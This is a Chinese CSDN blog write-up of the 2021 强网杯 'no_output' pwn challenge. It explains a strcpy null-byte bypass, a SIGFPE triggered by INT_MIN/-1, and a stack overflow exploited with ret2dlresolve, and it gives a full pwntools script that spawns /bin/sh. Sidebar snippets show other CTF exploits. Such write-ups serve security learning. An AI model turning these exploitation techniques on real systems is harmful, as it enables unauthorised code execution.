2021 强网杯 [强网先锋] no_output

最新推荐文章于 2021-09-02 11:15:28 发布
最新推荐文章于 2021-09-02 11:15:28 发布
阅读量546 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/118066709
版权

在这里插入图片描述保护

在这里插入图片描述
你的输入会跟打开的文件里面的字符串进行比较,比较成功才会进入下一步。

在这里插入图片描述
但是我们发现上面用了一个strcpy函数,这个函数会用’\x00’结尾,我们可以再上面让dest的后面一个字节为’\x00’,那个地方刚好是文件符的位置,就可以绕开比较。

在这里插入图片描述
绕开比较进入函数之后是一个signal,必须触发这个signal8才能进入最后的函数。

signal8是浮点例外。在发生致命的算术运算错误时发出. 不仅包括浮点运算错误, 还包括溢出及除数为0等其它所有的算术的错误。

不能除0,就构造溢出。

用-2147483648除-1,来触发。

在这里插入图片描述

给了个溢出,只有一次溢出,got表也是半开,所以我们直接想到用ret2dl。

exp

# -*- coding: utf-8 -*-
from pwn import *

context.log_level = "debug"

r = process("./test")

rop = ROP("./test")
elf = ELF("./test")

r.send("\x00")
raw_input(">")
r.send('A'*0x20)
raw_input(">")
r.send("hello_boy\x00")
raw_input(">")
r.sendline("-2147483648")
raw_input(">")
r.sendline("-1")
raw_input(">")
#raw_input是一个输入函数,也可以直接sleep

dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])
rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
#用的是pwntools的模板

info(rop.dump()) #查看rop信息

raw_input(">")
r.sendline(fit({0x4C: rop.chain(), 0x100: dlresolve.payload}))
#0x4c是写入rop链的地方,0x100是read读入的大小。
#fit就是填充一下

r.interactive()
yongbaoii
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[复现]-2021强网杯 [强网先锋]赌徒
zji
06-27 523
[复现]-2021强网杯 [强网先锋]赌徒 主要过程 首先我是centos7 php 。然后vim /flag根目录创建flag flag{35-44c7-850e-131e10c9a6ud} 我省略了zip.www扫描源码。 1、 在根目录下建立flag文件(这个文件在正式做题中我们是见不到的,实际上是需要我们通过解题找到这个文件的) vim /flag输入flag: flag{70702196032-ec35-44c7-850e-131e10c9a6ud} 保存退出 2、 在网站目录建立test
2021强网杯赛题.zip
12-17
强网杯
no output folder解决方案
qq_35363642的博客
08-01 6454
       这个原因主要是tomcat目录下执行部分文件权限不足,导致编译工作无法进行导致的。具体原因可能是,不同用户在操作服务时,存在权限差异导致的。root启动过一次服务,后来用其他用户进行服务的启动,而在启动之前没有删除tomcat/work/目录下的内容,该目录下还是存在属主为root用户的Catalina目录,在使用其他用户执行启动时,由于该Catalina已存在,就不再重新创建,...
Pycharm2019.2使用Jupyter notebook无法输出显示no output解决方案
o707191418的博客
11-05 9037
1. 问题描述 Pycharm2019.2Pro可以自动运行Jupyter notebook,但是在运行成功后却无法输出,如下图: 右边边栏中一直显示no output,但是正常来说运行之后这个位置会显示运行结果,这时候注意到上方 这里一直显示Starting,而不像是官网给出的显示一个服务器地址,具体问题出在哪也不太清楚,而且当结束jupyter服务时候会显示shutdown了0个kerne...
访问tomcat出现java.lang.IllegalStateException No output folder错误解决方法
dietuo3387的博客
12-20 1059
访问tomcat出现java.lang.IllegalStateException:Nooutputfolder错误解决方法问题:tomcat分为安装版和解压缩版,解压缩版如果解压到安装盘,在浏览器中访问http://localhost:8080,可能会出现500错误,错误提示如下:localhost:8080java.lang.IllegalStateException:...
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
强网杯 WriteUp By Nu1L
08-02
2022年第六届“强网杯”全国网络安全挑战赛
强网杯2022 pwn 赛题解析.docx
最新发布
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
强网杯 2021 no_output
九层台
06-16 3174
强网杯 2021 no_output 没有输出,包含栈溢出。进行两次校验,前两次输入直接用angr模板获取。但是angr不能直接探索到触发信号之后(可能是咱不懂) import angr import sys import binascii def main(argv): path_to_binary = "./test" # :string project = angr.Project(path_to_binary)#要分析的二进制文件 # 告诉ange从哪里开始执行entr
PWN题[强网先锋]no_output
am_03的博客
09-02 463
知识点 strcpy(dest, src) strcpy 函数用于将指定长度的字符串复制到字符数组里 语法形式为:char *strcpy(char *dest, const char *src, int n), 表示把src所指向的字符串里以src地址开始的前n个字节复制到dest所指的数组里,并返回被复制后的dest。 strcpy:strcpy只用于字符串复制,并且它不仅复制字符串内容之外,还会复制字符串的结束符 例:strcpy(a,b) b为源字符串,a为复制b的字符串 read(unk_804C
2021强网杯】Write-Up真题PWN和RE部分(强推)
kali_Ma的博客
06-16 1389
前言 不得不说强网的反作弊做的真心不错 re 不一样 真心可以 话不多说,请往下看: baby_diary 参考实现堆块复用,后面就是常规题目 EXP # encoding:utf-8 from pwn import * libc=ELF('./libc-2.31.so') def add(size,data='a'): p.recvuntil('>> ') p.sendline('1') p.recvuntil('ize: ') p.sendline(str(size)) p.
Ubuntu: org.apache.jasper.JasperException: java.lang.IllegalStateException: No output folder
地平线的专栏
09-11 3542
org.apache.jasper.JasperException: java.lang.IllegalStateException: No output folder:         关于这个原因主要是权限的问题,在tomcat/work/Catalina/localhost/         主要是这个目录没有被读写的权限,导致文件不能被编译到该指定的工作目录中,此时我们就要针对与这个目
强网杯2021 pwn部分wp
eeeeeight的博客
06-18 1254
baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相加再相加相加…直到变成一个byte的数字, 然后加到输入数据的后一位上, 因此我们可以尝试控制输入的内容, 从而控制下一个chunk的size大小 在确定完溢出点后, 我们便开始准备伪造chunk了, 由于要满足p->fd->bk == p, p->bk->fd == p以及prevsize == size, 我们需要申请一个largebin的chunk
2021 强网杯 [强网先锋]orw
yongbaoii的博客
06-23 588
RELRO没都开,能劫持got,NX也没开,总得写点shellcode。 是个堆。 只能申请两个chunk,但是好像有个序号可以越界。
强网杯wp
Sentiment的博客
07-22 1010
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 强网杯wp PWN PWN no_output 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import nu
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ... error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] .... echo "Upload: " .... echo "Type: " .... echo "Size: " ....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值